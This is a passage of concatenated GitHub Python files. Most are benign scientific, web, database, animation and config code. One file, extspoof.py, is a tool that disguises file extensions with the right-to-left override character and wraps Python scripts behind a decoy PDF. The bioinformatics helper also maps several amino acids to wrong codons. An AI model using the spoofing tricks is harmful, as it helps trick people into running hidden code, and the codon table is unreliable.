derivatives\n\n Returns:\n np.ndarray: The hysteresis loop as (h, m) pairs\n \"\"\"\n h_values = np.linspace(h_max, h_min, num_h_points)\n\n mh_curve = []\n mag = -1\n\n for h in h_values:\n _, mag = find_magnetization(energy_func, derivative, second_derivative, mag, min_x, max_x, x_steps, args=((h,) + args))\n mh_curve.append((h, mag))\n\n return np.array(mh_curve)\n","repo_name":"nleehone/StonerWohlfarth","sub_path":"sw.py","file_name":"sw.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3100783161","text":"import os\nimport time\nimport sys\nimport base64\n\nlogo = \"\"\"\n\n\n@@@@@@@@ @@@ @@@ @@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@@@\n@@! @@! !@@ @!! !@@ @@! @@@ @@! @@@ @@! @@@ @@!\n@!!!:! !@@!@! @!! !@@!! @!@@!@! @!@ !@! @!@ !@! @!!!:!\n!!: !: :!! !!: !:! !!: !!: !!! !!: !!! !!:\n: :: :: ::: ::: : ::.: : : : :. : : :. : :\n\n\n made by Loubaris | github.com/Loubaris\n\n\"\"\"\n\n\nmenu = \"\"\"\nCommands\n - rlt | Spoof extension using rlt exploit\n - ctm \n Create a pdf|png|etc file that runs python code w/o console.\n\n - exit | Exit program\nAPI\n - 'from extspoof import rlt'\n - 'rlt(\"filename new_extension\")'\n(ExtSpoof)>\"\"\"\n\n\ndef rlt(command):\n print(\"(ExtSpoof) - Starting Right To Left module.\\n\")\n try:\n command = command.split(\" \")\n except Exception as e:\n pass\n for i in range(5):\n try:\n command[i]\n except Exception as e:\n command.append(\"\")\n argv1 = command[1]\n argv2 = command[2]\n if os.path.exists(argv1):\n argv1_splitted = argv1.split(\".\")\n new_file_name = (argv1_splitted[0]+str(\"\\u202E\")+str(argv2[::-1])+\".\"+str(argv1_splitted[1]))\n try:\n os.rename(argv1, new_file_name)\n print(\"(ExtSpoof) - Successfully spoofed\")\n except Exception as e:\n printf(\"Error while renaming\\nError: {e}\")\n\n else:\n print(\"(ExtSpoof) - File was not found.\")\n\n\ndef ctm(command):\n print(\"(ExtSpoof) - Starting python code hiddener module.\\n\")\n try:\n command = command.split(\" \")\n except Exception as e:\n pass\n for i in range(5):\n try:\n command[i]\n except Exception as e:\n command.append(\"\")\n argv1 = command[1]\n argv2 = command[2]\n\n input_data = argv2\n output_file = argv1\n # Encode the PDF file into a string\n try:\n with open(input_data, \"rb\") as pdf_file:\n encoded_string = base64.b64encode(pdf_file.read()).decode(\"utf-8\")\n \n with open(output_file, \"a\") as new_code:\n new_code.write(\"\\n\\nimport base64\\n\\n\")\n new_code.write(\"encoded_pdf = \\\"\" + encoded_string + \"\\\"\\n\\n\")\n new_code.write(\"# Decode the PDF string back into bytes\\n\")\n new_code.write(\"decoded_pdf = base64.b64decode(encoded_pdf)\\n\\n\")\n new_code.write(\"# Write the decoded PDF bytes into a new file\\n\")\n new_code.write(\"with open(\\\"decoded.pdf\\\", \\\"wb\\\") as pdf_file:\\n\")\n new_code.write(\" pdf_file.write(decoded_pdf)\\n\")\n print(\"(ExtSpoof) - Success.\")\n\n except:\n print(\"ExtSpoof - File was not found.\")\n\n\ndef extspoof():\n os.system(\"cls\")\n print(logo)\n command = input(menu)\n command = command.split(\" \")\n if command[0] == \"rlt\":\n rlt(command)\n elif command[0] == \"ctm\":\n ctm(command)\n else:\n print(\"(ExtSpoof) - Unknown command\")\n os.system(\"set /p DUMMY=Press Enter to continue\")\n extspoof()\n\n if command[0] != \"exit\":\n os.system(\"set /p DUMMY=Press Enter to continue\")\n else:\n sys.exit()\n os.system(\"cls\")\n extspoof()\n\n\nif __name__ == \"__main__\":\n extspoof()\n","repo_name":"Loubaris/Extension-Spoofer","sub_path":"extspoof.py","file_name":"extspoof.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"41080295978","text":"from flask import Flask, render_template\nimport pymongo\nfrom scrape_mars import scrape\napp = Flask(__name__)\n\n# setup mongo connection\nconn = \"mongodb://localhost:27017\"\nclient = pymongo.MongoClient(conn)\ndb=client.mars\ncollection = db.mars_data\n\n\n@app.route('/')\ndef index():\n \n scrape()\n data=list(db.mars_data.find())\n #print(data[0])\n \n\n return render_template(\"index.html\", mars_data=data[0])\n\n@app.route('/scrape')\ndef scraped_page():\n\n scrape()\n data=list(db.mars_data.find())\n length=len(data)\n \n return render_template(\"index.html\", mars_data=data[length-1]) \n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n\n\n\n","repo_name":"svitlana-nazarchuk/web-scraping-challenge","sub_path":"Missions_to_Mars/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9026358265","text":"\"\"\"Add openid\n\nRevision ID: 6204b5143f0\nRevises: 52b8d5765c69\nCreate Date: 2012-09-15 05:39:46.922671\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '6204b5143f0'\ndown_revision = '52b8d5765c69'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('openid', sa.String(length=255), nullable=False))\n op.alter_column('user', u'google_id',\n existing_type=sa.VARCHAR(length=255),\n nullable=True)\n op.alter_column('user', u'name',\n existing_type=sa.VARCHAR(length=32),\n nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('user', u'name',\n existing_type=sa.VARCHAR(length=32),\n nullable=False)\n op.alter_column('user', u'google_id',\n existing_type=sa.VARCHAR(length=255),\n nullable=False)\n op.drop_column('user', 'openid')\n ### end Alembic commands ###\n","repo_name":"mkandalf/prioritize","sub_path":"server/alembic/versions/6204b5143f0_add_openid.py","file_name":"6204b5143f0_add_openid.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35481281623","text":"import os\nfrom types import SimpleNamespace\nimport git\n\nfrom dimidium.lib.dosa_dtype import DosaDtype, convert_tvmDtype_to_DosaDtype\n\n\n__filedir__ = os.path.dirname(os.path.abspath(__file__))\nis_initiated = False\nconfig = SimpleNamespace()\nconfig.git_version = 'UNKNOWN'\nuc = {}\n\n\ndef init_singleton(config_dict, main_path=None):\n global config\n global is_initiated\n\n config.backend = SimpleNamespace()\n config.backend.input_latency = config_dict['input_latency']\n config.backend.output_latency = config_dict['output_latency']\n config.backend.create_rank_0_for_io = bool(config_dict['build']['create_rank_0_for_io'])\n config.backend.comm_message_pipeline_store = int(config_dict['build']['comm_message_interleaving']) # to be updated during runtime\n config.backend.comm_message_interleaving = int(config_dict['build']['comm_message_interleaving'])\n config.backend.maximum_pipeline_store_per_node = int(config_dict['build']['maximum_pipeline_store_per_node'])\n config.backend.generate_testbenchs = config_dict['build']['generate_testbenchs']\n config.backend.insert_debug_cores = bool(config_dict['build']['insert_debug_cores'])\n config.backend.tmux_parallel_build = int(config_dict['build']['parallel_builds_tmux'])\n config.backend.clean_build = bool(config_dict['build']['start_from_clean_build'])\n config.backend.comm_message_max_buffer_interleaving = int(config_dict['build']['max_buffer_interleaving'])\n config.backend.allow_multiple_cpu_clients = bool(config_dict['build']['allow_multiple_cpu_clients'])\n\n config.dtype = SimpleNamespace()\n config.dtype.default_dosa_flops_conv_factor = float(config_dict['dtypes']['default_flops_conv_factor'])\n config.dtype.dosa_flops_base_type = convert_tvmDtype_to_DosaDtype(config_dict['dtypes']['flops_base_type'])\n config.dtype.flops_base_str = config_dict['dtypes']['flops_base_str']\n config.dtype.flops_per_dsp_xilinx_fpgas = float(config_dict['dtypes']['flops_per_dsp_xilinx_fpgas'])\n config.dtype.dsps_per_dosa_flops_xilinx_fpgas = (1 / config.dtype.flops_per_dsp_xilinx_fpgas)\n config.dtype.dosa_flops_explanation_str = 'using {} DSPs per FLOPS'\\\n .format(config.dtype.dsps_per_dosa_flops_xilinx_fpgas)\n\n config.dtype.dosa_kappa = float(config_dict['dosa_learning']['kappa'])\n config.dtype.dosa_lambda = {}\n for k in config_dict['dosa_learning']['lambda']:\n if k == 'fallback':\n config.dtype.dosa_lambda[DosaDtype.UNKNOWN] = float(config_dict['dosa_learning']['lambda'][k])\n else:\n config.dtype.dosa_lambda[convert_tvmDtype_to_DosaDtype(k)] = float(config_dict['dosa_learning']['lambda'][k])\n\n config.quant = SimpleNamespace()\n config.quant.overwrite_imported_dtypes = False\n config.quant.overwrite_fixed_point_dtypes = False\n config.quant.numbers_already_scaled = True # TODO: change default to False (if quant module is merged)\n # config.quant.use_extra_accum_dtype = False\n config.quant.activation_dtype = DosaDtype.UNKNOWN\n config.quant.weight_dtype = DosaDtype.UNKNOWN\n config.quant.bias_dtype = DosaDtype.UNKNOWN\n config.quant.fixed_point_fraction_bits = None\n # config.quant.per_layer_dtypes = {}\n\n\n config.middleend = SimpleNamespace()\n config.middleend.engine_saving_threshold = float(config_dict['build']['engine_saving_threshold'])\n\n config.utilization = SimpleNamespace()\n config.utilization.dosa_mu_comp = float(config_dict['dosa_learning']['mu']['compute'])\n config.utilization.dosa_mu_mem = float(config_dict['dosa_learning']['mu']['memory'])\n config.utilization.xilinx_luts_to_dsp_factor = float(config_dict['utilization']['xilinx_luts_to_dsp_factor'])\n config.utilization.xilinx_lutram_to_bram_factor = float(config_dict['utilization']['xilinx_lutram_to_bram_factor'])\n config.utilization.dosa_xi = float(config_dict['utilization']['max_utilization_fpgas'])\n config.utilization.dosa_xi_exception = float(config_dict['utilization']['max_utilization_fpgas']) + \\\n float(config_dict['utilization']['utilization_exception'])\n\n config.dse = SimpleNamespace()\n config.dse.allow_throughput_degradation = bool(config_dict['dse']['allow_throughput_degradation'])\n config.dse.allowed_throughput_degradation = 0.0\n if config.dse.allow_throughput_degradation:\n config.dse.allowed_throughput_degradation = float(config_dict['dse']['allowed_throughput_degradation'])\n print(\"[DOSA:config:INFO] Allowing a degredation of the throughput of {} from the targeted throughput.\"\n .format(config.dse.allowed_throughput_degradation))\n\n config.dse.max_vertical_split = 500\n\n if main_path is not None:\n repo = git.Repo(path=main_path, search_parent_directories=True)\n cur_sha = repo.git.describe()\n config.git_version = cur_sha\n\n is_initiated = True\n return 0\n\n\ndef add_global_build_dir(abs_path):\n global config\n if config.backend.clean_build:\n os.system(\"rm -rf {}\".format(abs_path))\n else:\n print('[DOSA:build:INFO] Not deleting existing content in output dir.')\n os.system(\"mkdir -p {}\".format(abs_path))\n config.global_build_dir = abs_path\n config.global_report_dir = os.path.abspath('{}/tmp_rpt_dir'.format(abs_path))\n os.system(\"mkdir -p {}\".format(config.global_report_dir))\n os.system(\"cp {}/../backend/buildTools/templates/dosa_report.py {}/\".format(__filedir__, abs_path))\n return 0\n\n\ndef add_user_constraints(uc_dict):\n global uc\n uc = uc_dict\n return 0\n\n\n","repo_name":"cloudFPGA/DOSA","sub_path":"dimidium/lib/singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":5549,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"28841664980","text":"from manim import *\n\nconfig.background_color = BLACK\n\n\nclass LinearCommits(Scene):\n NO_COMMITS_ON_MASTER = 3\n NO_COMMITS_ON_FEATURE = 3\n ARROW_COLOR = GRAY\n COMMIT_FILL_COLOR = BLUE\n COMMIT_STROKE_COLOR = ORANGE\n COMMIT_LABEL_COLOR = BLACK\n HEAD_REF_COLOR = RED\n BRANCH_REF_COLOR = GREEN\n\n def construct(self):\n commits_on_feature = []\n arrows_between_master_commits = []\n\n self.intro()\n\n master_ref = self.create_branch_ref('master')\n init = self.show_command(\"git init\", None)\n self.play(FadeIn(master_ref))\n\n head_ref = self.create_head_ref()\n head_ref.next_to(master_ref, UP)\n self.play(FadeIn(head_ref))\n\n head_to_master_arrow = self.create_arrow_between_refs(\n head_ref, master_ref, DOWN)\n self.play(FadeIn(head_to_master_arrow))\n\n # create the commits\n commits_on_master = [self.create_commit(f'M{idx}') for idx in range(self.NO_COMMITS_ON_MASTER)]\n\n # arrange the commits and create the arrows between them\n for idx in range(1, len(commits_on_master)):\n commits_on_master[idx].next_to(\n commits_on_master[idx - 1], RIGHT)\n arrows_between_master_commits.append(self.create_arrow_between_commits(\n commits_on_master[idx], commits_on_master[idx - 1]))\n\n g = Group(master_ref, head_ref, head_to_master_arrow)\n self.play(FadeOut(g))\n\n # show the commits\n cmd = None\n master_to_commit_arrow = None\n for idx in range(len(commits_on_master)):\n cmd = self.show_command(f'git commit -m \\'M{idx}\\'', after=init if cmd is None else cmd)\n\n # show new commit\n self.play(FadeIn(commits_on_master[idx]))\n # connect the current commit with the previous one\n if idx > 0:\n self.play(FadeIn(arrows_between_master_commits[idx - 1]))\n # remove the arrow between master and commit\n self.remove(master_to_commit_arrow)\n\n # move the master ref\n if idx == 0:\n master_ref.next_to(commits_on_master[idx], UP)\n self.add(master_ref)\n else:\n self.play(master_ref.animate.next_to(\n commits_on_master[idx], UP))\n\n # create new arrow between master and commit\n master_to_commit_arrow = self.create_arrow_between_ref_and_commit(\n master_ref, commits_on_master[idx], UP)\n self.play(FadeIn(master_to_commit_arrow))\n\n # remove the arrow between head and master\n self.remove(head_to_master_arrow)\n\n # move the head ref\n if idx == 0:\n head_ref.next_to(master_ref, UP)\n self.add(head_ref)\n else:\n self.play(head_ref.animate.next_to(master_ref, UP))\n\n # create new arrow between head and master\n head_to_master_arrow = self.create_arrow_between_refs(\n head_ref, master_ref, DOWN)\n self.play(FadeIn(head_to_master_arrow))\n\n #\n # NEW FEATURE BRANCH\n #\n\n # create a new branch based on the last commit\n feature_ref = self.create_branch_ref(\"feature\")\n feature_ref.next_to(commits_on_master[-1], DOWN)\n\n cmd = self.show_command(\"git branch feature\", after=cmd)\n\n self.play(FadeIn(feature_ref))\n\n feature_to_commit_arrow = self.create_arrow_between_ref_and_commit(\n feature_ref, commits_on_master[-1], DOWN)\n self.play(FadeIn(feature_to_commit_arrow))\n\n # remove the arrow between head and master\n self.remove(head_to_master_arrow)\n\n cmd = self.show_command(\"git checkout feature\", after=cmd)\n\n # move the head ref to point to the new feature ref\n self.play(head_ref.animate.next_to(feature_ref, DOWN))\n\n head_to_feature_arrow = self.create_arrow_between_refs(\n head_ref, feature_ref, UP)\n self.play(FadeIn(head_to_feature_arrow))\n\n g = Group(feature_ref, feature_to_commit_arrow,\n head_ref, head_to_feature_arrow)\n\n # create new commits on the feature branch\n for idx in range(self.NO_COMMITS_ON_FEATURE):\n # create commit\n commits_on_feature.append(self.create_commit(f'F{idx}'))\n\n # position the commit\n next_to = commits_on_master[-1] if idx == 0 else commits_on_feature[idx - 1]\n commits_on_feature[idx].next_to(\n next_to, DOWN if idx == 0 else RIGHT)\n if idx == 0:\n commits_on_feature[idx].shift(RIGHT * 0.5)\n\n # remove the feature ref and arrow between it and the commit\n if idx == 0:\n self.play(FadeOut(g))\n\n cmd = self.show_command(f'git commit -m \\'F{idx}\\'', after=cmd)\n\n # show the commit\n self.play(FadeIn(commits_on_feature[idx]))\n\n # show the arrow between the commits\n previous_commit = commits_on_master[-1] if idx == 0 else commits_on_feature[idx - 1]\n is_linear = False if idx == 0 else True\n arrow_between_commits = self.create_arrow_between_commits(\n commits_on_feature[idx], previous_commit, linear=is_linear)\n self.play(FadeIn(arrow_between_commits))\n\n # remove the arrow between the feature ref and commit\n self.remove(feature_to_commit_arrow)\n\n # move the feature ref\n self.play(feature_ref.animate.next_to(\n commits_on_feature[idx], DOWN))\n # show the arrow between the feature ref and commit\n feature_to_commit_arrow = self.create_arrow_between_ref_and_commit(\n feature_ref, commits_on_feature[idx], DOWN)\n self.play(FadeIn(feature_to_commit_arrow))\n\n self.remove(head_to_feature_arrow)\n self.play(head_ref.animate.next_to(feature_ref, DOWN))\n head_to_feature_arrow = self.create_arrow_between_refs(\n head_ref, feature_ref, UP)\n self.play(FadeIn(head_to_feature_arrow))\n\n self.wait(2)\n\n def intro(self):\n my_site = Text(\"vladflore.tech\", font=\"Noto Sans\").scale(0.75)\n self.play(Write(my_site))\n self.play(my_site.animate.shift(1.5 * UP))\n t = Text(\"Git Animated\", font=\"Noto Sans\",\n gradient=(RED, BLUE, GREEN)).scale(1.5)\n st = Text(\"From your first commit to your first branch\", font=\"Noto Sans\",\n color=BLUE).scale(0.5)\n g = Group(t, st).arrange(DOWN, buff=.8).next_to(my_site, DOWN, buff=0.8)\n self.play(FadeIn(g), run_time=2)\n self.play(FadeOut(g), run_time=2)\n self.play(my_site.animate.shift(1.5 * DOWN))\n self.play(Unwrite(my_site))\n\n def create_commit(self, id):\n circle = Circle(0.3).set_fill(\n color=self.COMMIT_FILL_COLOR, opacity=0.5).set_stroke(color=self.COMMIT_STROKE_COLOR, width=1)\n text = MarkupText(id, color=self.COMMIT_LABEL_COLOR).scale(0.2)\n circle.add(text)\n return circle\n\n def create_arrow_between_commits(self, start, end, linear=True):\n if linear:\n return self.create_arrow(start.point_at_angle(\n PI), end.point_at_angle(0), self.ARROW_COLOR)\n else:\n return self.create_arrow(start.point_at_angle(\n PI / 2), end.point_at_angle(0), self.ARROW_COLOR)\n\n def create_arrow_between_ref_and_commit(self, rectangle, circle, side):\n if np.array_equal(UP, side):\n start_arrow = rectangle.get_bottom()\n end_arrow = circle.point_at_angle(PI / 2)\n elif np.array_equal(DOWN, side):\n start_arrow = rectangle.get_top()\n end_arrow = circle.point_at_angle(3 * PI / 2)\n arrow = Arrow(start=start_arrow, end=end_arrow).set_color(\n self.ARROW_COLOR)\n return arrow\n\n def create_arrow_between_refs(self, start, end, side):\n if np.array_equal(UP, side):\n start_arrow = start.get_bottom()\n end_arrow = end.get_top()\n elif np.array_equal(DOWN, side):\n start_arrow = start.get_top()\n end_arrow = end.get_bottom()\n arrow = Arrow(start=start_arrow, end=end_arrow).set_color(\n self.ARROW_COLOR)\n return arrow\n\n def create_head_ref(self):\n rectangle = Rectangle(color=self.HEAD_REF_COLOR,\n width=0.5, height=0.25)\n text = MarkupText('HEAD', color=self.HEAD_REF_COLOR).scale(0.2)\n rectangle.add(text)\n return rectangle\n\n def create_branch_ref(self, name):\n rectangle = Rectangle(color=self.BRANCH_REF_COLOR,\n width=0.6, height=0.25)\n text = MarkupText(name, color=self.BRANCH_REF_COLOR).scale(0.2)\n rectangle.add(text)\n return rectangle\n\n @staticmethod\n def create_arrow(start, end, color):\n return Line(start=start, end=end, color=color).set_stroke(width=1.0).add_tip(tip_length=0.06)\n\n @staticmethod\n def create_command(text, after, corner=LEFT + UP, edge=LEFT):\n if after is None:\n return Text(text).scale(0.3).set_color(ORANGE).to_corner(corner).to_edge(edge)\n else:\n return Text(text).scale(0.3).set_color(ORANGE).next_to(after, DOWN).to_edge(edge)\n\n def show_command(self, command_text, after, speed=0.5):\n command = self.create_command(command_text, after)\n self.play(Write(command), run_time=speed)\n return command\n\n","repo_name":"vladflore/git-animated","sub_path":"linear-commits.py","file_name":"linear-commits.py","file_ext":"py","file_size_in_byte":9608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5215333107","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 17 10:35:47 2019\n\n@author: Administrator\n\"\"\"\n\nfrom Bio import SeqIO\nimport numpy as np\n\ndef uniprotSeqs():\n uniprot_seqs_dict = {}\n for seq_record in SeqIO.parse('uniprot_sprot.fasta', 'fasta'):\n uniprot_seqs_dict[seq_record.id] = str(seq_record.seq)\n return uniprot_seqs_dict\n\n\nimport random\ndef aa2code(aa:str):\n code={}\n code['A'] = ['GCU','GCC','GCA','GCG']\n code['C'] = ['UGU','UGC']\n code['D'] = ['GAU','GAC']\n code['E'] = ['GAA','GAG']\n code['F'] = ['UUU','UUC']\n code['H'] = ['GAU','GAC']\n code['I'] = ['AUU','AUC','AUA']\n code['G'] = ['GGU','GGC','GGA','GGG']\n code['K'] = ['AAA','AAG']\n code['L'] = ['UUA','UUG','GUU','GUC','GUA','GUG']\n code['M'] = ['AUG']\n code['N'] = ['AAU','AAC']\n code['Q'] = ['CAA','CAG']\n code['P'] = ['CCU','CCC','CCA','CCG']\n code['R'] = ['CGU','CGC','CGA','CGG','AGA','AGG']\n code['S'] = ['UCU','UCC','UCA','UCG']\n code['T'] = ['ACU','ACC','ACA','ACG']\n code['V'] = ['GUU','GUC','GUA','GUG']\n code['W'] = ['UGG']\n code['Y'] = ['UAU','UAC']\n code['#'] = ['XXX']\n\n c = code[aa]\n return random.choice(c)\n\ndef plot_history(history):\n import matplotlib.pyplot as plt\n #%matplotlib inline\n acc = history.history['accuracy']\n val_acc = history.history['val_accuracy']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n \n epochs = range(1, len(acc) + 1)\n \n # \"bo\" is for \"blue dot\"\n plt.plot(epochs, loss, 'bo', label='Training loss')\n # b is for \"solid blue line\"\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n \n plt.show()\n \n plt.clf() # clear figure \n plt.plot(epochs, acc, 'bo', label='Training acc')\n plt.plot(epochs, val_acc, 'b', label='Validation acc')\n plt.title('Training and validation accuracy')\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend()\n \n plt.show()\n \ndef displayMetrics(y_true, y_score, threshold=0.5):\n from sklearn import metrics\n y_pred = (y_score > threshold).astype(float)\n cm = metrics.confusion_matrix(y_true, y_pred)\n print(\"confusion_matrix:\\n\", cm)\n acc = metrics.accuracy_score(y_true, y_pred)\n print(\"accuracy:\", acc)\n mcc = metrics.matthews_corrcoef(y_true, y_pred)\n print(\"MCC:\", mcc)\n auc = metrics.roc_auc_score(y_true, y_score)\n print(\"AUC:\", auc)\n\ndef displayMLMetrics(y_true, y_pred, fileName, info):\n # output Multi-lable classifier's Metrics\n from sklearn import metrics\n with open(fileName, 'a') as fw:\n fw.write(info)\n fw.write(\"hamming loss = {}\\n\".format(metrics.hamming_loss(y_true, y_pred)))\n fw.write(\"subset accuracy = {}\\n\".format( metrics.accuracy_score(y_true, y_pred)))\n fw.write(\"macro average precision_score: {}\\n\".format(metrics.average_precision_score(y_true,y_pred,average=\"macro\")))\n fw.write(\"micro average precisioin_score: {}\\n\".format(metrics.average_precision_score(y_true,y_pred,average=\"micro\")))\n \ndef plot_cm(labels, predictions, p=0.5):\n from sklearn.metrics import confusion_matrix\n #import matplotlib as mpl\n import matplotlib.pyplot as plt\n import seaborn as sns\n #mpl.rcParams['figure.figsize'] = (12, 10)\n #colors = plt.rcParams['axes.prop_cycle'].by_key()['color']\n cm = confusion_matrix(labels, predictions > p)\n plt.figure(figsize=(5,5))\n sns.heatmap(cm, annot=True, fmt=\"d\")\n plt.title('Confusion matrix @{:.2f}'.format(p))\n plt.ylabel('Actual label')\n plt.xlabel('Predicted label')\n \n print('Legitimate Transactions Detected (True Negatives): ', cm[0][0])\n print('Legitimate Transactions Incorrectly Detected (False Positives): ', cm[0][1])\n print('Fraudulent Transactions Missed (False Negatives): ', cm[1][0])\n print('Fraudulent Transactions Detected (True Positives): ', cm[1][1])\n print('Total Fraudulent Transactions: ', np.sum(cm[1])) \n \n \n \n ","repo_name":"javafalcon/jci","sub_path":"bio/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"17698614357","text":"\"\"\"Development settings.\"\"\"\n\nimport os\n\nfrom settings import * # noqa: F401, F403\n\nSECRET_KEY = 'development-only'\nDEBUG = True\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), # noqa: F405\n }\n}\n","repo_name":"CSESoc-CompClub/compclub-web","sub_path":"settings_dev.py","file_name":"settings_dev.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38090245435","text":"import sys\nimport os\n\n\nimport argparse\nfrom pyhocon import ConfigFactory\n\n\ndef parse_args(\n callback=None,\n training=False,\n default_conf=\"conf/default_mv.conf\",\n default_expname=\"example\",\n default_data_format=\"dvr\",\n default_num_epochs=10000000,\n default_lr=1e-4,\n default_gamma=1.00,\n default_datadir=\"data\",\n default_ray_batch_size=50000,\n):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--conf\", \"-c\", type=str, default=None)\n parser.add_argument(\"--resume\", \"-r\", action=\"store_true\", help=\"continue training\")\n parser.add_argument(\n \"--gpu_id\", type=str, default=\"0\", help=\"GPU(s) to use, space delimited\"\n )\n parser.add_argument(\n \"--name\", \"-n\", type=str, default=default_expname, help=\"experiment name\"\n )\n parser.add_argument(\n \"--dataset_format\",\n \"-F\",\n type=str,\n default=None,\n help=\"Dataset format, multi_obj | dvr | dvr_gen | dvr_dtu | srn\",\n )\n parser.add_argument(\n \"--exp_group_name\",\n \"-G\",\n type=str,\n default=None,\n help=\"if we want to group some experiments together\",\n )\n parser.add_argument(\n \"--logs_path\", type=str, default=\"logs\", help=\"logs output directory\",\n )\n parser.add_argument(\n \"--checkpoints_path\",\n type=str,\n default=\"checkpoints\",\n help=\"checkpoints output directory\",\n )\n parser.add_argument(\n \"--visual_path\",\n type=str,\n default=\"visuals\",\n help=\"visualization output directory\",\n )\n parser.add_argument(\n \"--epochs\",\n type=int,\n default=default_num_epochs,\n help=\"number of epochs to train for\",\n )\n parser.add_argument(\"--lr\", type=float, default=default_lr, help=\"learning rate\")\n parser.add_argument(\n \"--gamma\", type=float, default=default_gamma, help=\"learning rate decay factor\"\n )\n parser.add_argument(\n \"--datadir\", \"-D\", type=str, default=None, help=\"Dataset directory\"\n )\n parser.add_argument(\n \"--ray_batch_size\", \"-R\", type=int, default=default_ray_batch_size, help=\"Ray batch size\"\n )\n if callback is not None:\n parser = callback(parser)\n args = parser.parse_args()\n\n if args.exp_group_name is not None:\n args.logs_path = os.path.join(args.logs_path, args.exp_group_name)\n args.checkpoints_path = os.path.join(args.checkpoints_path, args.exp_group_name)\n args.visual_path = os.path.join(args.visual_path, args.exp_group_name)\n\n os.makedirs(os.path.join(args.checkpoints_path, args.name), exist_ok=True)\n os.makedirs(os.path.join(args.visual_path, args.name), exist_ok=True)\n\n PROJECT_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\", \"..\"))\n EXPCONF_PATH = os.path.join(PROJECT_ROOT, \"expconf.conf\")\n expconf = ConfigFactory.parse_file(EXPCONF_PATH)\n\n if args.conf is None:\n args.conf = expconf.get_string(\"config.\" + args.name, default_conf)\n\n if args.conf is None:\n args.conf = expconf.get_string(\"config.\" + args.name, default_conf)\n if args.datadir is None:\n args.datadir = expconf.get_string(\"datadir.\" + args.name, default_datadir)\n\n conf = ConfigFactory.parse_file(args.conf)\n\n if args.dataset_format is None:\n args.dataset_format = conf.get_string(\"data.format\", default_data_format)\n\n args.gpu_id = list(map(int, args.gpu_id.split()))\n\n print(\"EXPERIMENT NAME:\", args.name)\n if training:\n print(\"CONTINUE?\", \"yes\" if args.resume else \"no\")\n print(\"* Config file:\", args.conf)\n print(\"* Dataset format:\", args.dataset_format)\n print(\"* Dataset location:\", args.datadir)\n return args, conf\n","repo_name":"sxyu/pixel-nerf","sub_path":"src/util/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":1273,"dataset":"github-code","pt":"54"} +{"seq_id":"25712256105","text":"from kafka import KafkaConsumer\n\nfrom src.utils.email_notification import send_email\n\n\nclass Availability:\n def __init__(self):\n self.monitor_availability()\n\n def check_statuscode(self, entry):\n parsed = entry.value.decode(\"utf-8\").split(\",\")\n if (\n parsed[2].find(\n \"recommendation request fall2022-comp585-5.cs.mcgill.ca:8082\"\n )\n != -1\n ):\n if parsed[3].find(\"status 200\") == -1:\n send_email(\n \"[COMP585] Recommendation failed status not 200\",\n entry.value.decode(\"utf-8\"),\n )\n print(entry.value.decode(\"utf-8\"))\n return\n\n def monitor_availability(self):\n server, topic = \"fall2022-comp585.cs.mcgill.ca:9092\", \"movielog5\"\n consumer = KafkaConsumer(\n topic, bootstrap_servers=[server], api_version=(0, 11, 5)\n )\n print(\"start monitoring availability\")\n for message in consumer:\n self.check_statuscode(message)\n\n\nif __name__ == \"__main__\":\n Availability()\n","repo_name":"mayshri/Team-5","sub_path":"src/monitor/availability.py","file_name":"availability.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24733053060","text":"# Try it yourself, page 115\n\ncities = {\n 'new york' : {\n 'country' : 'united states',\n 'population' : '8.623 million',\n 'fact' : 'it is the largest metropolitan area in the world by urban landmass',\n },\n 'shanghai' : {\n 'country' : 'china',\n 'population' : '24.1 million',\n 'fact' : 'its population makes it the most populous city not only in Asia but in the entire world',\n },\n 'moscow' : {\n 'country' : 'russia',\n 'population' : '13.1 million',\n 'fact' : 'has been ranked as the ninth most expensive city in the world',\n },\n }\n\nfor name, info in cities.items():\n print(\"\\n\" + name.title() + \":\")\n country = info['country'].title()\n population = info['population']\n fact = info['fact'].capitalize()\n\n print(\"\\t\" + country)\n print(\"\\t\" + population)\n print(\"\\t\" + fact)\n\n\n","repo_name":"bwest619/Python-Crash-Course","sub_path":"Ch 6 - 